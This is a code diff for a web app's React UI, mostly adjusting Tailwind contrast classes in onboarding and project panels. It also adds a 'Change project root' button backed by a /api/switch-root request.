@@ -96,7 +96,7 @@ export function StepProvider({ providers, selectedId, onSelect, onNext, onBack }
                       "active:scale-[0.98]",
                       selected
                         ? "border-foreground/30 bg-foreground/[0.06]"
-                        : "border-border/40 bg-card/20 hover:border-foreground/15 hover:bg-card/50",
+                        : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
                     )}
                     data-testid={`onboarding-provider-${provider.id}`}
                   >
@@ -116,7 +116,7 @@ export function StepProvider({ providers, selectedId, onSelect, onNext, onBack }
                       <div className="flex items-center gap-2">
                         <span className="text-sm font-semibold text-foreground">{provider.label}</span>
                         {provider.recommended && (
-                          <Badge variant="outline" className="border-foreground/10 bg-foreground/[0.03] text-[9px] text-foreground/50">
+                          <Badge variant="outline" className="border-foreground/10 bg-foreground/[0.03] text-[9px] text-muted-foreground">
                             Recommended
                           </Badge>
                         )}
@@ -129,7 +129,7 @@ export function StepProvider({ providers, selectedId, onSelect, onNext, onBack }
                             <span>{configuredViaLabel(provider.configuredVia)}</span>
                           </>
                         ) : (
-                          <span className="text-muted-foreground/50">Not configured</span>
+                          <span className="text-muted-foreground">Not configured</span>
                         )}
                       </div>
                     </div>
@@ -138,7 +138,7 @@ export function StepProvider({ providers, selectedId, onSelect, onNext, onBack }
                       {capabilityBadges(provider).map((cap) => (
                         <Tooltip key={cap}>
                           <TooltipTrigger asChild>
-                            <Badge variant="outline" className="border-border/30 text-[10px] text-muted-foreground/60">
+                            <Badge variant="outline" className="border-border/50 text-[10px] text-muted-foreground">
                               {cap}
                             </Badge>
                           </TooltipTrigger>
diff --git a/web/components/gsd/onboarding/step-ready.tsx b/web/components/gsd/onboarding/step-ready.tsx
index 48cc692a9..96c17dd81 100644
--- a/web/components/gsd/onboarding/step-ready.tsx
+++ b/web/components/gsd/onboarding/step-ready.tsx
@@ -51,7 +51,7 @@ export function StepReady({ providerLabel, onFinish }: StepReadyProps) {
         initial={{ opacity: 0, y: 12 }}
         animate={{ opacity: 1, y: 0 }}
         transition={{ delay: 0.26, duration: 0.4 }}
-        className="mt-8 flex items-center gap-4 rounded-xl border border-border/40 bg-card/30 px-5 py-3"
+        className="mt-8 flex items-center gap-4 rounded-xl border border-border/50 bg-card/50 px-5 py-3"
       >
         <div className="flex items-center gap-2 text-xs text-muted-foreground">
           <Image
@@ -70,7 +70,7 @@ export function StepReady({ providerLabel, onFinish }: StepReadyProps) {
           />
           <span>Shell unlocked</span>
         </div>
-        <div className="h-3 w-px bg-border/60" />
+        <div className="h-3 w-px bg-border" />
         <div className="flex items-center gap-1.5 text-xs text-muted-foreground">
           <span className="h-1.5 w-1.5 rounded-full bg-success" />
           <span>{providerLabel}</span>
diff --git a/web/components/gsd/onboarding/step-remote.tsx b/web/components/gsd/onboarding/step-remote.tsx
index 2096effcf..143199470 100644
--- a/web/components/gsd/onboarding/step-remote.tsx
+++ b/web/components/gsd/onboarding/step-remote.tsx
@@ -207,7 +207,7 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
         {/* Channel picker */}
         {!loading && (
           <div className="space-y-2">
-            <div className="text-xs font-medium text-muted-foreground/60">Channel</div>
+            <div className="text-xs font-medium text-muted-foreground">Channel</div>
             <div className="grid grid-cols-3 gap-2">
               {CHANNEL_OPTIONS.map((opt) => (
                 <button
@@ -225,11 +225,11 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
                     "active:scale-[0.97]",
                     channel === opt.value
                       ? "border-foreground/30 bg-foreground/[0.06]"
-                      : "border-border/40 bg-card/20 hover:border-foreground/15 hover:bg-card/50",
+                      : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
                   )}
                 >
                   <div className="text-sm font-medium text-foreground">{opt.label}</div>
-                  <div className="mt-0.5 text-[11px] text-muted-foreground/60">{opt.description}</div>
+                  <div className="mt-0.5 text-[11px] text-muted-foreground">{opt.description}</div>
                 </button>
               ))}
             </div>
@@ -239,7 +239,7 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
         {/* Channel ID input */}
         {channel && !loading && (
           <div className="space-y-2">
-            <div className="text-xs font-medium text-muted-foreground/60">Channel ID</div>
+            <div className="text-xs font-medium text-muted-foreground">Channel ID</div>
             <Input
               value={channelId}
               onChange={(e) => {
@@ -266,7 +266,7 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
         {/* Bot token input */}
         {channel && !loading && (
           <div className="space-y-2">
-            <div className="text-xs font-medium text-muted-foreground/60">
+            <div className="text-xs font-medium text-muted-foreground">
               Bot token
               {tokenSet && (
                 <span className="ml-2 text-success">✓ configured</span>
@@ -296,7 +296,7 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
                 <button
                   type="button"
                   onClick={() => setShowToken((v) => !v)}
-                  className="absolute right-3 top-1/2 -translate-y-1/2 text-muted-foreground/50 hover:text-muted-foreground transition-colors"
+                  className="absolute right-3 top-1/2 -translate-y-1/2 text-muted-foreground hover:text-muted-foreground transition-colors"
                 >
                   {showToken ? <EyeOff className="h-3.5 w-3.5" /> : <Eye className="h-3.5 w-3.5" />}
                 </button>
@@ -365,7 +365,7 @@ export function StepRemote({ onBack, onNext }: StepRemoteProps) {
             <Button
               variant="ghost"
               onClick={onNext}
-              className="gap-1.5 text-muted-foreground/70 transition-transform active:scale-[0.96]"
+              className="gap-1.5 text-muted-foreground transition-transform active:scale-[0.96]"
             >
               Skip
               <SkipForward className="h-3.5 w-3.5" />
diff --git a/web/components/gsd/onboarding/step-welcome.tsx b/web/components/gsd/onboarding/step-welcome.tsx
index e21f0f290..feeae92b1 100644
--- a/web/components/gsd/onboarding/step-welcome.tsx
+++ b/web/components/gsd/onboarding/step-welcome.tsx
@@ -54,7 +54,7 @@ export function StepWelcome({ onNext }: StepWelcomeProps) {
         initial={{ opacity: 0, y: 12 }}
         animate={{ opacity: 1, y: 0 }}
         transition={{ delay: 0.24, duration: 0.4 }}
-        className="mt-10 flex items-center gap-3 text-xs text-muted-foreground/60"
+        className="mt-10 flex items-center gap-3 text-xs text-muted-foreground"
       >
         {["Mode", "Provider", "Auth", "Workspace"].map((label, i) => (
           <span key={label} className="flex items-center gap-3">
diff --git a/web/components/gsd/onboarding/wizard-stepper.tsx b/web/components/gsd/onboarding/wizard-stepper.tsx
index 2a99561b3..d62a442cf 100644
--- a/web/components/gsd/onboarding/wizard-stepper.tsx
+++ b/web/components/gsd/onboarding/wizard-stepper.tsx
@@ -61,8 +61,8 @@ export function WizardStepper({ steps, currentIndex, onStepClick, className }: W
                 className={cn(
                   "hidden text-sm font-medium transition-colors duration-200 sm:inline",
                   isCurrent && "text-foreground",
-                  isComplete && "text-foreground/70",
-                  !isComplete && !isCurrent && "text-muted-foreground/60",
+                  isComplete && "text-muted-foreground",
+                  !isComplete && !isCurrent && "text-muted-foreground",
                 )}
               >
                 {step.shortLabel ?? step.label}
diff --git a/web/components/gsd/project-welcome.tsx b/web/components/gsd/project-welcome.tsx
index f366c7222..34792fe8a 100644
--- a/web/components/gsd/project-welcome.tsx
+++ b/web/components/gsd/project-welcome.tsx
@@ -156,7 +156,7 @@ export function ProjectWelcome({
 
         {/* Detail note */}
         {variant.detail && (
-          <p className="mt-2 text-xs leading-relaxed text-muted-foreground/70">
+          <p className="mt-2 text-xs leading-relaxed text-muted-foreground">
             {variant.detail}
           </p>
         )}
diff --git a/web/components/gsd/projects-view.tsx b/web/components/gsd/projects-view.tsx
index c9be904a8..83e906889 100644
--- a/web/components/gsd/projects-view.tsx
+++ b/web/components/gsd/projects-view.tsx
@@ -65,6 +65,7 @@ interface ProjectDetectionSignals {
   hasCargo?: boolean
   hasGoMod?: boolean
   hasPyproject?: boolean
+  isMonorepo?: boolean
 }
 
 interface ProjectProgressInfo {
@@ -121,6 +122,7 @@ const KIND_STYLE: Record<ProjectDetectionKind, { label: string; color: string; b
 
 function techStack(signals: ProjectDetectionSignals): string[] {
   const tags: string[] = []
+  if (signals.isMonorepo) tags.push("Monorepo")
   if (signals.hasGitRepo) tags.push("Git")
   if (signals.hasPackageJson) tags.push("Node.js")
   if (signals.hasCargo) tags.push("Rust")
@@ -183,7 +185,7 @@ function ProjectCard({
         "active:scale-[0.98]",
         isActive
           ? "border-primary/30 bg-primary/[0.08]"
-          : "border-border/40 bg-card/20 hover:border-foreground/15 hover:bg-card/50",
+          : "border-border/50 bg-card/50 hover:border-foreground/15 hover:bg-card/50",
         disabled && "opacity-40 pointer-events-none",
       )}
     >
@@ -227,7 +229,7 @@ function ProjectCard({
 
         {/* Row 3: progress info */}
         {progress && (
-          <div className="mt-1.5 text-[11px] text-muted-foreground/70">{progress}</div>
+          <div className="mt-1.5 text-[11px] text-muted-foreground">{progress}</div>
         )}
 
         {/* Row 4: milestone progress bar */}
@@ -243,13 +245,13 @@ function ProjectCard({
                 }}
               />
             </div>
-            <span className="text-[10px] tabular-nums text-muted-foreground/60">{milestoneCount}</span>
+            <span className="text-[10px] tabular-nums text-muted-foreground">{milestoneCount}</span>
           </div>
         )}
       </div>
 
       {/* Arrow */}
-      <ArrowRight className="mt-1 h-4 w-4 shrink-0 text-muted-foreground/30 transition-all group-hover:text-muted-foreground/70 group-hover:translate-x-0.5" />
+      <ArrowRight className="mt-1 h-4 w-4 shrink-0 text-muted-foreground/50 transition-all group-hover:text-muted-foreground group-hover:translate-x-0.5" />
     </button>
   )
 }
@@ -317,22 +319,35 @@ export function ProjectsPanel({
 
   const handleDevRootSaved = useCallback(
     async (newRoot: string) => {
-      setDevRoot(newRoot)
       setLoading(true)
       setError(null)
       try {
-        const discovered = await loadProjects(newRoot)
-        setProjects(discovered)
+        // Validate path and persist in a single call
+        const res = await authFetch("/api/switch-root", {
+          method: "POST",
+          headers: { "Content-Type": "application/json" },
+          body: JSON.stringify({ devRoot: newRoot }),
+        })
+
+        if (!res.ok) {
+          const body = await res.json().catch(() => ({}))
+          throw new Error((body as { error?: string }).error ?? `Request failed (${res.status})`)
+        }
+
+        const data = await res.json() as { devRoot: string; projects: ProjectMetadata[] }
+        setDevRoot(data.devRoot)
+        setProjects(data.projects)
       } catch (err) {
-        setError(err instanceof Error ? err.message : "Failed to load projects")
+        setError(err instanceof Error ? err.message : "Failed to switch project root")
       } finally {
         setLoading(false)
       }
     },
-    [loadProjects],
+    [],
   )
 
   const [newProjectOpen, setNewProjectOpen] = useState(false)
+  const [changeRootOpen, setChangeRootOpen] = useState(false)
   const workspaceState = useGSDWorkspaceState()
 
   const handleProjectCreated = useCallback(
@@ -356,7 +371,6 @@ export function ProjectsPanel({
     // loading toast managed by WorkspaceChrome
     onOpenChange(false)
     manager.switchProject(project.path)
-    window.dispatchEvent(new CustomEvent("gsd:navigate-view", { detail: { view: "dashboard" } }))
   }
 
   // Sort: active-gsd first, then by name
@@ -430,7 +444,7 @@ export function ProjectsPanel({
           onClick={() => setNewProjectOpen(true)}
           className={cn(
             "flex w-full items-center gap-3.5 rounded-xl border border-dashed px-4 py-3.5 text-left transition-all duration-200",
-            "border-border/40 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
+            "border-border/50 text-muted-foreground hover:border-foreground/15 hover:text-foreground",
             "active:scale-[0.98]",
           )}
         >
@@ -439,7 +453,7 @@ export function ProjectsPanel({
           </div>
           <div>
             <span className="text-sm font-medium">Create new project</span>
-            <p className="mt-0.5 text-[11px] text-muted-foreground/70">Initialize a new directory with Git</p>
+            <p className="mt-0.5 text-[11px] text-muted-foreground">Initialize a new directory with Git</p>
           </div>
         </button>
 
@@ -464,15 +478,23 @@ export function ProjectsPanel({
         </SheetHeader>
 
         {/* Visible header */}
-        <div className="flex items-center justify-between border-b border-border/40 px-5 py-4">
+        <div className="flex items-center justify-between border-b border-border/50 px-5 py-4">
           <div>
             <h2 className="text-base font-semibold text-foreground">Projects</h2>
             {devRoot && !loading && (
-              <p className="mt-0.5 text-xs text-muted-foreground">
-                <code className="rounded bg-muted px-1 py-0.5 font-mono text-[10px]">{devRoot}</code>
-                <span className="ml-1.5 text-muted-foreground/50">·</span>
-                <span className="ml-1.5">{projects.length} project{projects.length !== 1 ? "s" : ""}</span>
-              </p>
+              <div className="mt-0.5 flex items-center gap-1.5 text-xs text-muted-foreground">
+                <code className="rounded bg-muted px-1 py-0.5 font-mono text-[10px] truncate max-w-[200px]">{devRoot}</code>
+                <button
+                  type="button"
+                  onClick={() => setChangeRootOpen(true)}
+                  className="shrink-0 text-[10px] text-primary hover:text-primary/80 transition-colors font-medium"
+                  data-testid="projects-panel-change-root"
+                >
+                  Change
+                </button>
+                <span className="text-muted-foreground">·</span>
+                <span>{projects.length} project{projects.length !== 1 ? "s" : ""}</span>
+              </div>
             )}
           </div>
           <Button variant="ghost" size="icon" className="h-8 w-8 shrink-0" onClick={() => onOpenChange(false)}>
@@ -484,6 +506,14 @@ export function ProjectsPanel({
         <ScrollArea className="min-h-0 flex-1">
           <div className="px-5 py-4">{content}</div>
         </ScrollArea>
+
+        {/* Folder picker for changing dev root */}
+        <FolderPickerDialog
+          open={changeRootOpen}
+          onOpenChange={setChangeRootOpen}
+          onSelect={(path) => void handleDevRootSaved(path)}
+          initialPath={devRoot}
+        />
       </SheetContent>
     </Sheet>
   )
@@ -508,7 +538,7 @@ function ActiveProjectSummary({ workspaceState }: { workspaceState: ReturnType<t
 
   if (parts.length === 0) return null
 
-  return <div className="mt-1.5 text-[11px] text-muted-foreground/70">{parts.join(" · ")}</div>
+  return <div className="mt-1.5 text-[11px] text-muted-foreground">{parts.join(" · ")}</div>
 }
 
 // ─── New Project Dialog ────────────────────────────────────────────────
@@ -697,7 +727,7 @@ function FolderPickerDialog({
           </DialogDescription>
         </DialogHeader>
 
-        <div className="border-y border-border/40 bg-muted/30 px-5 py-2">
+        <div className="border-y border-border/50 bg-muted/50 px-5 py-2">
           <p className="font-mono text-xs text-muted-foreground truncate" title={currentPath}>
             {currentPath}
           </p>
@@ -733,7 +763,7 @@ function FolderPickerDialog({
                   >
                     <Folder className="h-4 w-4 text-muted-foreground shrink-0" />
                     <span className="text-foreground truncate flex-1">{entry.name}</span>
-                    <ChevronRight className="h-3.5 w-3.5 text-muted-foreground/40 opacity-0 group-hover:opacity-100 transition-opacity shrink-0" />
+                    <ChevronRight className="h-3.5 w-3.5 text-muted-foreground opacity-0 group-hover:opacity-100 transition-opacity shrink-0" />
                   </button>
                 ))}
 
@@ -745,7 +775,7 @@ function FolderPickerDialog({
           </div>
         </ScrollArea>
 
-        <DialogFooter className="border-t border-border/40 px-5 py-3">
+        <DialogFooter className="border-t border-border/50 px-5 py-3">
           <Button variant="ghost" size="sm" onClick={() => onOpenChange(false)}>
             Cancel
           </Button>
@@ -816,7 +846,7 @@ function DevRootSetup({
     return (
       <div className="space-y-3" data-testid="devroot-settings">
         <div className="flex items-center gap-2">
-          <code className="flex-1 truncate rounded border border-border/40 bg-muted/30 px-3 py-2 font-mono text-xs text-foreground">
+          <code className="flex-1 truncate rounded border border-border/50 bg-muted/50 px-3 py-2 font-mono text-xs text-foreground">
             {currentRoot}
           </code>
           <Button
@@ -916,7 +946,7 @@ export function DevRootSettingsSection() {
     <div className="space-y-3" data-testid="settings-devroot">
       <div className="flex items-center gap-2.5">
         <FolderRoot className="h-3.5 w-3.5 text-muted-foreground" />
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">
           Development Root
         </h3>
       </div>
@@ -943,6 +973,7 @@ export function ProjectSelectionGate() {
   const [loading, setLoading] = useState(true)
   const [error, setError] = useState<string | null>(null)
   const [newProjectOpen, setNewProjectOpen] = useState(false)
+  const [changeRootOpen, setChangeRootOpen] = useState(false)
   const [filter, setFilter] = useState("")
 
   const loadProjects = useCallback(async (root: string) => {
@@ -989,19 +1020,30 @@ export function ProjectSelectionGate() {
 
   const handleDevRootSaved = useCallback(
     async (newRoot: string) => {
-      setDevRoot(newRoot)
       setLoading(true)
       setError(null)
       try {
-        const discovered = await loadProjects(newRoot)
-        setProjects(discovered)
+        const res = await authFetch("/api/switch-root", {
+          method: "POST",
+          headers: { "Content-Type": "application/json" },
+          body: JSON.stringify({ devRoot: newRoot }),
+        })
+
+        if (!res.ok) {
+          const body = await res.json().catch(() => ({}))
+          throw new Error((body as { error?: string }).error ?? `Request failed (${res.status})`)
+        }
+
+        const data = await res.json() as { devRoot: string; projects: ProjectMetadata[] }
+        setDevRoot(data.devRoot)
+        setProjects(data.projects)
       } catch (err) {
-        setError(err instanceof Error ? err.message : "Failed to load projects")
+        setError(err instanceof Error ? err.message : "Failed to switch project root")
       } finally {
         setLoading(false)
       }
     },
-    [loadProjects],
+    [],
   )
 
   const handleProjectCreated = useCallback(
@@ -1120,20 +1162,36 @@ export function ProjectSelectionGate() {
             {/* ─── Project list ─── */}
             {hasProjects && (
               <div className="space-y-5">
+                {/* Dev root + change button */}
+                {devRoot && (
+                  <div className="flex items-center gap-2 text-xs text-muted-foreground">
+                    <FolderRoot className="h-3.5 w-3.5 shrink-0 text-muted-foreground" />
+                    <code className="rounded bg-muted px-1.5 py-0.5 font-mono text-[10px] text-muted-foreground truncate">{devRoot}</code>
+                    <button
+                      type="button"
+                      onClick={() => setChangeRootOpen(true)}
+                      className="shrink-0 text-[11px] text-primary hover:text-primary/80 transition-colors font-medium"
+                      data-testid="gate-change-root"
+                    >
+                      Change
+                    </button>
+                  </div>
+                )}
+
                 {/* Filter + count */}
                 <div className="flex items-center justify-between gap-4">
-                  <p className="text-xs text-muted-foreground/60 tabular-nums">
+                  <p className="text-xs text-muted-foreground tabular-nums">
                     {sortedProjects.length} project{sortedProjects.length !== 1 ? "s" : ""}
                   </p>
                   {showFilter && (
                     <div className="relative w-48">
-                      <Search className="absolute left-2.5 top-1/2 -translate-y-1/2 h-3.5 w-3.5 text-muted-foreground/50" />
+                      <Search className="absolute left-2.5 top-1/2 -translate-y-1/2 h-3.5 w-3.5 text-muted-foreground" />
                       <input
                         type="text"
                         placeholder="Filter…"
                         value={filter}
                         onChange={(e) => setFilter(e.target.value)}
-                        className="h-8 w-full rounded-md border border-border bg-background pl-8 pr-3 text-xs text-foreground placeholder:text-muted-foreground/40 focus:outline-none focus:ring-1 focus:ring-ring"
+                        className="h-8 w-full rounded-md border border-border bg-background pl-8 pr-3 text-xs text-foreground placeholder:text-muted-foreground focus:outline-none focus:ring-1 focus:ring-ring"
                       />
                     </div>
                   )}
@@ -1175,7 +1233,7 @@ export function ProjectSelectionGate() {
                               <span>{stack.join(" · ")}</span>
                             )}
                             {stack.length > 0 && progress && (
-                              <span className="text-muted-foreground/30">—</span>
+                              <span className="text-muted-foreground/50">—</span>
                             )}
                             {progress && (
                               <span className="truncate">{progress}</span>
@@ -1192,7 +1250,7 @@ export function ProjectSelectionGate() {
                                 style={{ width: `${pct}%` }}
                               />
                             </div>
-                            <span className="text-[10px] tabular-nums text-muted-foreground/50 w-6 text-right">
+                            <span className="text-[10px] tabular-nums text-muted-foreground w-6 text-right">
                               {project.progress!.milestonesCompleted}/{project.progress!.milestonesTotal}
                             </span>
                           </div>
@@ -1200,13 +1258,13 @@ export function ProjectSelectionGate() {
 
                         {/* Modified time */}
                         {project.lastModified > 0 && (
-                          <span className="hidden lg:inline text-[10px] text-muted-foreground/40 shrink-0 w-16 text-right tabular-nums">
+                          <span className="hidden lg:inline text-[10px] text-muted-foreground shrink-0 w-16 text-right tabular-nums">
                             {relativeTime(project.lastModified)}
                           </span>
                         )}
 
                         {/* Arrow */}
-                        <ChevronRight className="h-4 w-4 shrink-0 text-muted-foreground/20 transition-colors group-hover:text-muted-foreground/60" />
+                        <ChevronRight className="h-4 w-4 shrink-0 text-muted-foreground/50 transition-colors group-hover:text-muted-foreground" />
                       </button>
                     )
                   })}
@@ -1240,8 +1298,31 @@ export function ProjectSelectionGate() {
                 )}
               </div>
             )}
+
+            {/* Change root for "no projects" and "no devRoot" states */}
+            {devRoot && !loading && sortedProjects.length === 0 && !error && (
+              <div className="mt-4">
+                <button
+                  type="button"
+                  onClick={() => setChangeRootOpen(true)}
+                  className="flex items-center gap-2 text-xs text-primary hover:text-primary/80 transition-colors font-medium"
+                  data-testid="gate-change-root-empty"
+                >
+                  <FolderOpen className="h-3.5 w-3.5" />
+                  Change project root
+                </button>
+              </div>
+            )}
         </div>
       </div>
+
+      {/* Folder picker for changing dev root */}
+      <FolderPickerDialog
+        open={changeRootOpen}
+        onOpenChange={setChangeRootOpen}
+        onSelect={(path) => void handleDevRootSaved(path)}
+        initialPath={devRoot}
+      />
     </div>
   )
 }
diff --git a/web/components/gsd/remaining-command-panels.tsx b/web/components/gsd/remaining-command-panels.tsx
index 37558cd70..27787c16f 100644
--- a/web/components/gsd/remaining-command-panels.tsx
+++ b/web/components/gsd/remaining-command-panels.tsx
@@ -76,7 +76,7 @@ function PanelHeader({
     <div className="flex items-center justify-between gap-3 pb-4">
       <div className="flex items-center gap-2.5">
         <span className="text-muted-foreground">{icon}</span>
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">{title}</h3>
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">{title}</h3>
         {status}
         {subtitle && <span className="text-[11px] text-muted-foreground">{subtitle}</span>}
       </div>
@@ -109,7 +109,7 @@ function PanelLoading({ label }: { label: string }) {
 
 function PanelEmpty({ message }: { message: string }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-4 py-5 text-center text-xs text-muted-foreground">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-4 py-5 text-center text-xs text-muted-foreground">
       {message}
     </div>
   )
@@ -123,7 +123,7 @@ function InfoPill({ label, value, variant }: { label: string; value: string | nu
       variant === "warning" && "border-warning/20 bg-warning/5 text-warning",
       variant === "success" && "border-success/20 bg-success/5 text-success",
       variant === "error" && "border-destructive/20 bg-destructive/5 text-destructive",
-      (!variant || variant === "default") && "border-border/40 bg-card/50 text-foreground/80",
+      (!variant || variant === "default") && "border-border/50 bg-card/50 text-foreground/80",
     )}>
       <span className="text-muted-foreground">{label}</span>
       <span className="font-medium tabular-nums">{value}</span>
@@ -155,21 +155,21 @@ export function QuickPanel() {
         icon={<Zap className="h-3.5 w-3.5" />}
       />
 
-      <div className="rounded-lg border border-border/30 bg-card/30 px-4 py-4 space-y-3">
-        <p className="text-xs text-foreground/90">
+      <div className="rounded-lg border border-border/50 bg-card/50 px-4 py-4 space-y-3">
+        <p className="text-xs text-foreground">
           Create a quick one-off task outside the current plan. Useful for small fixes, experiments, or ad-hoc work that
           doesn&apos;t fit into the milestone structure.
         </p>
 
         <div className="space-y-2">
-          <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Usage</h4>
-          <div className="rounded-md border border-border/20 bg-background/50 px-3 py-2 font-mono text-[11px] text-foreground/80">
+          <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Usage</h4>
+          <div className="rounded-md border border-border/50 bg-background/50 px-3 py-2 font-mono text-[11px] text-foreground/80">
             /gsd quick &lt;description&gt;
           </div>
         </div>
 
         <div className="space-y-2">
-          <h4 className="text-[11px] font-medium text-foreground/70 uppercase tracking-wide">Examples</h4>
+          <h4 className="text-[11px] font-medium text-muted-foreground uppercase tracking-wide">Examples</h4>
           <div className="space-y-1.5">
             {[
               "Fix the typo in README.md header",
@@ -178,8 +178,8 @@ export function QuickPanel() {
               "Run prettier on the whole project",
             ].map((example) => (
               <div key={example} className="flex items-center gap-2 text-[11px]">
-                <span className="text-muted-foreground/50">$</span>
-                <code className="font-mono text-foreground/70">/gsd quick {example}</code>
+                <span className="text-muted-foreground">$</span>
+                <code className="font-mono text-muted-foreground">/gsd quick {example}</code>
               </div>
             ))}
           </div>
@@ -231,7 +231,7 @@ export function HistoryPanel() {
           </div>
 
           {/* Tab switcher */}
-          <div className="flex gap-1 rounded-lg border border-border/30 bg-card/20 p-0.5">
+          <div className="flex gap-1 rounded-lg border border-border/50 bg-card/50 p-0.5">
             {(["phase", "slice", "model", "units"] as const).map((tab) => (
               <button
                 key={tab}
@@ -240,8 +240,8 @@ export function HistoryPanel() {
                 className={cn(
                   "flex-1 rounded-md px-2.5 py-1 text-[11px] font-medium capitalize transition-colors",
                   activeTab === tab
-                    ? "bg-card/80 text-foreground shadow-sm"
-                    : "text-muted-foreground hover:text-foreground/70",
+                    ? "bg-card text-foreground shadow-sm"
+                    : "text-muted-foreground hover:text-muted-foreground",
                 )}
               >
                 {tab === "units" ? "Recent" : `By ${tab}`}
@@ -251,10 +251,10 @@ export function HistoryPanel() {
 
           {/* By Phase */}
           {activeTab === "phase" && data.byPhase.length > 0 && (
-            <div className="overflow-x-auto rounded-lg border border-border/30">
+            <div className="overflow-x-auto rounded-lg border border-border/50">
               <table className="w-full text-[11px]">
                 <thead>
-                  <tr className="border-b border-border/30 bg-card/40">
+                  <tr className="border-b border-border/50 bg-card/50">
                     <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Phase</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Units</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Cost</th>
@@ -263,7 +263,7 @@ export function HistoryPanel() {
                 </thead>
                 <tbody>
                   {data.byPhase.map((row: HistoryPhaseAggregate) => (
-                    <tr key={row.phase} className="border-b border-border/20 last:border-0">
+                    <tr key={row.phase} className="border-b border-border/50 last:border-0">
                       <td className="px-2.5 py-1.5 font-mono text-foreground/80 capitalize">{row.phase}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{row.units}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{formatCost(row.cost)}</td>
@@ -277,10 +277,10 @@ export function HistoryPanel() {
 
           {/* By Slice */}
           {activeTab === "slice" && data.bySlice.length > 0 && (
-            <div className="overflow-x-auto rounded-lg border border-border/30">
+            <div className="overflow-x-auto rounded-lg border border-border/50">
               <table className="w-full text-[11px]">
                 <thead>
-                  <tr className="border-b border-border/30 bg-card/40">
+                  <tr className="border-b border-border/50 bg-card/50">
                     <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Slice</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Units</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Cost</th>
@@ -289,7 +289,7 @@ export function HistoryPanel() {
                 </thead>
                 <tbody>
                   {data.bySlice.map((row: HistorySliceAggregate) => (
-                    <tr key={row.sliceId} className="border-b border-border/20 last:border-0">
+                    <tr key={row.sliceId} className="border-b border-border/50 last:border-0">
                       <td className="px-2.5 py-1.5 font-mono text-foreground/80">{row.sliceId}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{row.units}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{formatCost(row.cost)}</td>
@@ -303,10 +303,10 @@ export function HistoryPanel() {
 
           {/* By Model */}
           {activeTab === "model" && data.byModel.length > 0 && (
-            <div className="overflow-x-auto rounded-lg border border-border/30">
+            <div className="overflow-x-auto rounded-lg border border-border/50">
               <table className="w-full text-[11px]">
                 <thead>
-                  <tr className="border-b border-border/30 bg-card/40">
+                  <tr className="border-b border-border/50 bg-card/50">
                     <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Model</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Units</th>
                     <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Cost</th>
@@ -314,7 +314,7 @@ export function HistoryPanel() {
                 </thead>
                 <tbody>
                   {data.byModel.map((row: HistoryModelAggregate) => (
-                    <tr key={row.model} className="border-b border-border/20 last:border-0">
+                    <tr key={row.model} className="border-b border-border/50 last:border-0">
                       <td className="px-2.5 py-1.5 font-mono text-foreground/80 truncate max-w-[180px]">{row.model}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{row.units}</td>
                       <td className="px-2.5 py-1.5 text-right tabular-nums text-foreground/80">{formatCost(row.cost)}</td>
@@ -329,10 +329,10 @@ export function HistoryPanel() {
           {activeTab === "units" && (
             <>
               {data.units.length > 0 ? (
-                <div className="overflow-x-auto rounded-lg border border-border/30">
+                <div className="overflow-x-auto rounded-lg border border-border/50">
                   <table className="w-full text-[11px]">
                     <thead>
-                      <tr className="border-b border-border/30 bg-card/40">
+                      <tr className="border-b border-border/50 bg-card/50">
                         <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Type</th>
                         <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">ID</th>
                         <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Model</th>
@@ -342,7 +342,7 @@ export function HistoryPanel() {
                     </thead>
                     <tbody>
                       {data.units.slice(0, 20).map((u, i) => (
-                        <tr key={i} className="border-b border-border/20 last:border-0">
+                        <tr key={i} className="border-b border-border/50 last:border-0">
                           <td className="px-2.5 py-1.5 font-mono text-foreground/80">{u.type}</td>
                           <td className="px-2.5 py-1.5 font-mono text-foreground/80 truncate max-w-[120px]">{u.id}</td>
                           <td className="px-2.5 py-1.5 text-muted-foreground truncate max-w-[120px]">{u.model}</td>
@@ -418,7 +418,7 @@ export function UndoPanel() {
             {result.success ? <CheckCircle2 className="h-3.5 w-3.5" /> : <XCircle className="h-3.5 w-3.5" />}
             <span className="font-medium">{result.success ? "Undo Successful" : "Undo Failed"}</span>
           </div>
-          <p className="mt-1 text-[11px] text-foreground/70">{result.message}</p>
+          <p className="mt-1 text-[11px] text-muted-foreground">{result.message}</p>
         </div>
       )}
 
@@ -427,8 +427,8 @@ export function UndoPanel() {
           {data.lastUnitType ? (
             <>
               {/* Last unit info */}
